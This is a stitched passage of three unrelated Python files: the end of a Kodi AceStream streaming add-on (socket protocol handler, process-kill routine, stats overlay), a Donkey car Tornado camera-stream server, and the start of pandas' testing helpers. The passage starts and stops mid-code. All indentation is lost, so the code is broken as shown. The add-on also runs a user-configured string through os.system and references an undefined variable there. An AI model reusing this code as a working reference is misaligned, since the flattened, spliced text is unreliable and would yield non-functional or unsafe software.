while not self.tsserv.files and not self.progress.iscanceled():
if xbmc.abortRequested:
self.log.out("XBMC is shutting down")
self.canceled = True
break
if self.tsserv.err:
self.canceled = True
self.log.out("Failed to load files")
break
xbmc.sleep(200)
if self.progress.iscanceled():
self.canceled = True
return False
if not self.tsserv.files:
self.sm('Failed to load list files')
self.canceled = True
return False
self.filelist=self.tsserv.files
self.file_count = self.tsserv.count
self.files={}
self.progress.update(89,translate(30053),'')
if self.file_count>1:
flist=json.loads(self.filelist)
for list in flist['files']:
self.files[urllib.unquote_plus(urllib.quote(list[0]))]=list[1]
elif self.file_count==1:
flist=json.loads(self.filelist)
list=flist['files'][0]
self.files[urllib.unquote_plus(urllib.quote(list[0]))]=list[1]
self.progress.update(100,translate(30054),'')
return "Ok"
def end(self):
self.active=False
comm='SHUTDOWN'
if self.conn:self.TSpush(comm)
self.log.out("Ending")
try: self._sock.shutdown(socket.SHUT_WR)
except: pass
if self.tsserv: self.tsserv.active=False
if self.tsserv: self.tsserv.join()
self.log.out("end thread")
self._sock.close()
self.log.out("socket closed")
if self.progress:self.progress.close()
if settings.getSetting('engine-status') == "true":
try:lat123._close()
except:pass
if self.canceled: stop_aceengine()
def __del__(self):
settings.setSetting('active','0')
class TSServ(threading.Thread):
def __init__(self,_socket):
self.pkey='n51LvQoTlJzNGaFxseRK-uvnvX-sD4Vm5Axwmc4UcoD-jruxmKsuJaH0eVgE'
threading.Thread.__init__(self)
self.log=Logger("TSServer")
self.inc=Logger('IN')
self.log.out("init")
self.sock=_socket
self.daemon = True
self.active = True
self.err = False
self.buffer=65020
self.temp=""
self.msg=None
self.version=None
self.fileslist=None
self.files=None
self.key=None
self.count=None
self.ind=None
self.got_url=None
self.event=None
self.proc=0
self.label=''
self.line=''
self.pause=False
def run(self):
while self.active and not self.err:
try:
self.last_received=self.sock.recv(self.buffer)
except: self.last_received=''
ind=self.last_received.find('\r\n')
cnt=self.last_received.count('\r\n')
if ind!=-1 and cnt==1:
self.last_received=self.temp+self.last_received[:ind]
self.temp=''
self.exec_com()
elif cnt>1:
fcom=self.last_received
ind=1
while ind!=-1:
ind=fcom.find('\r\n')
self.last_received=fcom[:ind]
self.exec_com()
fcom=fcom[(ind+2):]
elif ind==-1:
self.temp=self.temp+self.last_received
self.last_received=None
self.log.out('Daemon Dead')
def exec_com(self):
self.inc.out(self.last_received)
line=self.last_received
comm=self.last_received.split(' ')[0]
params=self.last_received.split(' ')[1::]
self.msg=line
if settings.getSetting('debug_mode') == "true":
print('Sent command: ' + str(comm))
if comm=='HELLOTS':
try: self.version=params[0].split('=')[1]
except: self.version='1.0.6'
try:
match = re.compile('key=(.*)').findall(line)
self.key = match[0].split(' ')[0]
except: self.key=None
elif comm=='LOADRESP':
fil = line
ll= fil[fil.find('{'):len(fil)]
self.fileslist=ll
json_files=json.loads(self.fileslist)
try:
aa=json_files['infohash']
if json_files['status']==2:
self.count=len(json_files['files'])
if json_files['status']==1:
self.count=1
if json_files['status']==0:
self.count=None
self.files=self.fileslist.split('\n')[0]
self.fileslist=None
self.log.out("files:%s"%self.files)
except:
self.count=None
self.fileslist=None
self.err=True
elif comm=='EVENT':
if self.last_received.split(' ')[1]=='cansave':
event=self.last_received.split(' ')[2:4]
ind= event[0].split('=')[1]
if int(ind)==int(self.ind): self.event=event
if self.last_received.split(' ')[1]=='getuserdata':
self.sock.send('USERDATA [{"gender": 1}, {"age": 3}]\r\n')
elif comm=='START' or comm=='PLAY':
servip=settings.getSetting('ip_addr')
self.got_url=self.last_received.split(' ')[1].replace('127.0.0.1',servip) #
self.log.out('Get Link:%s'%self.got_url)
self.params=self.last_received.split(' ')[2:]
if 'stream=1' in self.params: self.log.out('Live Stream')
else: self.log.out('VOD Stream')
elif comm=='RESUME': self.pause=0
elif comm=='PAUSE': self.pause=1
if comm=="STATUS": self.showStats(line)
def showStats(self,params):
params=params.split(' ')[1]
ss=re.compile('main:[a-z]+',re.S)
s1=re.findall(ss, params)[0]
st=s1.split(':')[1]
self.proc=0
self.label=" "
self.line=" "
if st=='idle':
self.label=translate(30055)
if settings.getSetting('debug_mode') == "true":
print('Received command Engine idle' )
elif st=='starting':
self.label=translate(30056)
if settings.getSetting('debug_mode') == "true":
print('Received command starting TS' )
elif st=='err':
self.label=translate(30057)
self.err="dl"
if settings.getSetting('debug_mode') == "true":
print('Received command ERROR!' )
elif st=='check':
self.label=translate(30058)
self.proc=int(params.split(';')[1])
if settings.getSetting('debug_mode') == "true":
print('Received command check' )
elif st=='prebuf':
self.proc=int( params.split(';')[1] )+0.1
self.label=translate(30059)
self.line='Seeds:%s Download:%sKb/s'%(params.split(';')[8],params.split(';')[5])
engine_data = { "action": str(translate(30059)), "percent": str(params.split(';')[1])+ "%","download":str(params.split(';')[5]) + " Kb/s", "upload":str(params.split(';')[7]) + " Kb/s","seeds":str(params.split(';')[8]),"total_download":str(int(params.split(';')[10])/(1024*1024))+'Mb',"total_upload":str(int(params.split(';')[12])/(1024*1024))+'Mb' }
if settings.getSetting('debug_mode') == "true":
print('Received command: ' + str(engine_data) )
elif st=='loading':
self.label=translate(30053)
if settings.getSetting('debug_mode') == "true":
print('Received command loading' )
elif st=='dl':
engine_data = { "action": str(translate(30060)), "percent": str(params.split(';')[1])+ "%","download":str(params.split(';')[3]) + " Kb/s", "upload":str(params.split(';')[5]) + " Kb/s","seeds":str(params.split(';')[6]),"total_download":str(int(params.split(';')[8])/(1024*1024))+'Mb',"total_upload":str(int(params.split(';')[10])/(1024*1024))+'Mb' }
if settings.getSetting('engine-status') == "true":
try:
lat123.set_information(engine_data)
except: pass
if settings.getSetting('debug_mode') == "true":
print('Received command: ' + str(engine_data) )
elif st=='buf':
engine_data = { "action": str(translate(30061)), "percent": str(params.split(';')[1])+ "%","download":str(params.split(';')[5]) + " Kb/s", "upload":str(params.split(';')[7]) + " Kb/s","seeds":str(params.split(';')[8]),"total_download":str(int(params.split(';')[10])/(1024*1024))+"Mb","total_upload":str(int(params.split(';')[12])/(1024*1024))+"Mb" }
if settings.getSetting('engine-status') == "true":
try:
lat123.set_information(engine_data)
except: pass
if settings.getSetting('debug_mode') == "true":
print('Received command: ' + str(engine_data) )
def end(self):
self.active = False
self.daemon = False
self.log.out('Daemon Fully Dead')
#thread to run the kill command right after the user hits stop
def ace_control_thread():
while json.loads(xbmc.executeJSONRPC('{"jsonrpc":"2.0","method":"Player.GetActivePlayers","params":{},"id":3}'))["result"]:
xbmc.sleep(500)
stop_aceengine()
#TODO - Windows and proper cache clear
def stop_aceengine():
if settings.getSetting('shutdown-engine') == 'true' and settings.getSetting('kill_type') == '0':
if xbmc.getCondVisibility('system.platform.windows'):
subprocess.Popen('taskkill /F /IM ace_engine.exe /T',shell=True)
#Need to finish this...
#if settings.getSetting('save') != "true":
# try:
# cache_file = self.lnk.split('/')[-2]
# acestream_cachefolder_file = os.path.join(os.getenv("SystemDrive"),'\_acestream_cache_',cache_file)
# xbmcvfs.delete(acestream_cachefolder_file)
# except: pass
elif xbmc.getCondVisibility('system.platform.linux') and not xbmc.getCondVisibility('System.Platform.Android'):
if "arm" in os.uname()[4]:
os.system("sh "+os.path.join(pastaperfil,"acestream","stop_acestream.sh"))
else:
os.system("kill $(ps aux | grep '[a]cestream' | awk '{print $1}')")
os.system("kill $(ps aux | grep '[a]cestream' | awk '{print $2}')")
if settings.getSetting('save') != "true":
try:
cache_file = xbmc.Player().getPlayingFile().split('/')[-2]
if 'arm' not in os.uname()[4]:
if settings.getSetting('acestream_cachefolder') == '': acestream_cachefolder_file = os.path.join(os.getenv("HOME"),'.ACEStream','cache','.acestream_cache')
else: acestream_cachefolder_file = settings.getSetting('acestream_cachefolder')
else:
if settings.getSetting('acestream_cachefolder') == '': acestream_cachefolder_file = os.path.join(os.getenv("HOME"),'.ACEStream','cache')
else: acestream_cachefolder_file = settings.getSetting('acestream_cachefolder')
folder,cachefiles = xbmcvfs.listdir(acestream_cachefolder_file)
for cachefile in cachefiles:
if cache_file in cachefile:
xbmcvfs.delete(os.path.join(acestream_cachefolder_file,cachefile))
except: pass
elif xbmc.getCondVisibility('system.platform.OSX'):
try:
kill_cmd = [os.path.join('/Applications','Ace Stream.app','Contents','Resources','Wine.bundle','Contents','Resources','bin','wine'),os.path.join('/Applications','Ace Stream.app','Contents','Resources','wineprefix','drive_c','windows','system','taskkill.exe'),'/f','/im','ace_engine.exe']
kill_proc = subprocess.Popen(kill_cmd,shell=False)
except: pass
elif xbmc.getCondVisibility('System.Platform.Android'):
try:
procshut_ace = subprocess.Popen(['ps','|','grep','python'],shell=False,stdout=subprocess.PIPE)
for line in procshut_ace.stdout:
match = re.findall(r'\S+', line.rstrip())
if match:
if 'acestream' in match[-1] and len(match)>2:
os.system("kill " + match[1])
xbmc.sleep(200)
except: pass
if settings.getSetting('save') != "true":
try:
if settings.getSetting('acestream_cachefolder') != '':
dirs, cache_files = xbmcvfs.listdir(os.path.join(settings.getSetting('acestream_cachefolder'),'.acestream_cache'))
print dirs,cache_files
for cache_file in cache_files:
xbmcvfs.delete(os.path.join(settings.getSetting('acestream_cachefolder'),'.acestream_cache',cache_file))
else:
acestream_cachefolder_file = os.path.join('/sdcard','.ACEStream','cache','.acestream_cache')
dirs, cache_files = xbmcvfs.listdir(acestream_cachefolder_file)
for cache_file in cache_files:
xbmcvfs.delete(os.path.join(acestream_cachefolder_file,cache_file))
except: pass
else:
if settings.getSetting('shutdown-engine') == 'true' and settings.getSetting('kill_type') == '1':
os.system(settings.getSetting(custom_kill_ace))
return
class OverlayText(object):
def __init__(self):
self.showing = False
self.window = xbmcgui.Window(12005)
viewport_w, viewport_h = self._get_skin_resolution()
font_max = 'font13'
font_min = 'font10'
origin_x = int(float(viewport_w)/1.3913)
origin_y = int(float(viewport_h)/8.0)
window_w = int(float(viewport_w)/3.7647)
window_h = int(float(viewport_h)/2.5714)
acelogo_w = int(float(window_w)/8.5)
acelogo_h = int(float(window_w)/11.0)
text_lat = int(float(window_w)/15)
text_w = int(float(window_w)/1.7)
text_h = int(float(window_h)/14)
fst_setting = int(float(window_h)/3.5)
fst_stat_setting = int(float(window_h)/1.4)
#main window
self._background = xbmcgui.ControlImage(origin_x, origin_y, window_w, window_h, os.path.join(addonpath,"resources","art","background.png"))
self._acestreamlogo = xbmcgui.ControlImage(origin_x + int(float(window_w)/11.3), origin_y + int(float(window_h)/14), acelogo_w, acelogo_h, os.path.join(addonpath,"resources","art","acestreamlogo.png"))
self._supseparator = xbmcgui.ControlImage(origin_x, origin_y + int(float(viewport_h)/12.176), window_w-10, 1, os.path.join(addonpath,"resources","art","separator.png"))
self._botseparator = xbmcgui.ControlImage(origin_x, origin_y + window_h - 30, window_w-10, 1, os.path.join(addonpath,"resources","art","separator.png"))
self._title = xbmcgui.ControlLabel(origin_x+int(float(window_w)/3.4), origin_y + text_h, window_w - 140, text_h, str(translate(30062)), font=font_max, textColor='0xFFEB9E17')
self._total_stats_label = xbmcgui.ControlLabel(origin_x+int(float(window_h)/1.72), origin_y + int(float(window_h)/1.6), int(float(window_w)/1.7), 20, str(translate(30063)), font=font_min, textColor='0xFFEB9E17')
#labels
self._action = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting, int(float(text_w)*1.6), text_h, str(translate(30064)) + ' N/A', font=font_min)
self._download = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting + text_h, int(float(text_w)*1.6), text_h, str(translate(30065)) + ' N/A', font=font_min)
self._upload = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting + 2*text_h, text_w, text_h, str(translate(30066)) + ' N/A', font=font_min)
self._seeds = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_setting + 3*text_h, text_w, text_h, str(translate(30067)) + ' N/A', font=font_min)
self._total_download = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_stat_setting, text_w, text_h, str(translate(30068)) + ' N/A', font=font_min)
self._total_upload = xbmcgui.ControlLabel(origin_x + text_lat, origin_y + fst_stat_setting + text_h, text_w, text_h, str(translate(30069)) + ' N/A', font=font_min)
self._percent_value = xbmcgui.ControlLabel(origin_x+int(float(window_h)/1.05), origin_y + fst_setting, text_w, text_h,'N/A', font=font_min)
def show(self):
self.showing=True
self.window.addControl(self._background)
self.window.addControl(self._acestreamlogo)
self.window.addControl(self._supseparator)
self.window.addControl(self._botseparator)
self.window.addControl(self._title)
self.window.addControl(self._action)
self.window.addControl(self._download)
self.window.addControl(self._upload)
self.window.addControl(self._seeds)
self.window.addControl(self._total_stats_label)
self.window.addControl(self._total_download)
self.window.addControl(self._total_upload)
self.window.addControl(self._percent_value)
def hide(self):
self.showing=False
self.window.removeControl(self._total_download)
self.window.removeControl(self._total_upload)
self.window.removeControl(self._percent_value)
self.window.removeControl(self._title)
self.window.removeControl(self._action)
self.window.removeControl(self._download)
self.window.removeControl(self._upload)
self.window.removeControl(self._seeds)
self.window.removeControl(self._total_stats_label)
self.window.removeControl(self._acestreamlogo)
self.window.removeControl(self._supseparator)
self.window.removeControl(self._botseparator)
self.window.removeControl(self._background)
def set_information(self,engine_data):
if self.showing == True:
self._action.setLabel(str(translate(30064)) + ' ' + engine_data["action"])
self._percent_value.setLabel(engine_data["percent"])
self._download.setLabel(str(translate(30065))+ ' ' + engine_data["download"])
self._upload.setLabel(str(translate(30066)) + ' ' + engine_data["upload"])
self._seeds.setLabel(str(translate(30067)) + ' ' + engine_data["seeds"])
self._total_download.setLabel(str(translate(30068)) + ' ' + engine_data["total_download"])
self._total_upload.setLabel(str(translate(30069)) + ' ' + engine_data["total_upload"])
else: pass
def _close(self):
if self.showing:
self.hide()
else:
pass
try:
self.window.clearProperties()
print("OverlayText window closed")
except: pass
#Taken from xbmctorrent
def _get_skin_resolution(self):
import xml.etree.ElementTree as ET
skin_path = xbmc.translatePath("special://skin/")
tree = ET.parse(os.path.join(skin_path, "addon.xml"))
try: res = tree.findall("./res")[0]
except: res = tree.findall("./extension/res")[0]
return int(res.attrib["width"]), int(res.attrib["height"])
|
__init__.py
|
import io
import json
import logging
import os
import random
import socket
import time
import threading
import tornado
import tornado.ioloop
import tornado.web
import tornado.gen
import numpy as np
import PIL.Image
from .. import base
logger = logging.getLogger(__name__ )
def get_ip_address():
try:
ip = ([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1],
[[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in
[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])
return ip
except OSError: #occurs when cannot connect to '8.8.8.8'
return "127.0.0.1" #loopback
def arr_to_binary(arr):
"""
accepts: PIL image
returns: binary stream (used to save to database)
"""
arr = np.uint8(arr)
img = PIL.Image.fromarray(arr)
f = io.BytesIO()
img.save(f, format='jpeg')
return f.getvalue()
class WebStatus(tornado.web.Application):
port = 8887
def __init__(self):
logger.info('Starting Donkey Server...')
self.img_arr = np.zeros((160, 120, 3))
self.status = {}
self.recording = False
self.drive_mode = "user"
self.vehicle_running = False
this_dir = os.path.dirname(os.path.realpath(__file__))
self.static_file_path = os.path.join(this_dir, 'templates', 'static')
handlers = [
(r"/", tornado.web.RedirectHandler, dict(url="/status")),
(r"/video", VideoAPI),
(r"/status", StatusAPI),
(r"/updates", UpdateAPI),
(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": self.static_file_path}),
]
settings = {'debug': True}
super().__init__(handlers, **settings)
self.listen(self.port)
self.instance = tornado.ioloop.IOLoop.instance()
self.instance.add_callback(self.say_hello)
self._thread = threading.Thread(target=self.instance.start)
self._thread.daemon = True
self._thread.start()
def say_hello(self):
print("You can watch the camera stream at http://%s:8887/status" %
(get_ip_address(), ))
def stop(self):
self.instance.stop()
def __del__(self):
pass
# self.stop()
def set_image(self, img_arr):
self.img_arr = img_arr
def set_car_status(self, status):
self.status = status
class UpdateAPI(tornado.web.RequestHandler):
def get(self):
data = self.application.status
if data:
data = data._asdict()
self.write(json.dumps(data))
class StatusAPI(tornado.web.RequestHandler):
def get(self):
data = {}
self.render("templates/status.html", **data)
def post(self):
"""
Receive post requests as user changes the angle
and throttle of the vehicle on a the index webpage
"""
data = tornado.escape.json_decode(self.request.body)
self.application.recording = data["recording"]
self.application.drive_mode = data["drive_mode"]
self.application.vehicle_running = data["vehicle_running"]
class VideoAPI(tornado.web.RequestHandler):
"""
Serves a MJPEG of the images posted from the vehicle.
"""
@tornado.web.asynchronous
@tornado.gen.coroutine
def get(self):
ioloop = tornado.ioloop.IOLoop.current()
self.set_header("Content-type", "multipart/x-mixed-replace;boundary=--boundarydonotcross")
self.served_image_timestamp = time.time()
my_boundary = "--boundarydonotcross"
while True:
interval = .1
if self.served_image_timestamp + interval < time.time():
img = arr_to_binary(self.application.img_arr)
self.write(my_boundary)
self.write("Content-type: image/jpeg\r\n")
self.write("Content-length: %s\r\n\r\n" % len(img))
self.write(img)
self.served_image_timestamp = time.time()
yield tornado.gen.Task(self.flush)
else:
yield tornado.gen.Task(ioloop.add_timeout, ioloop.time() + interval)
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, List, Optional, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas._typing import FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = False,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs,
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
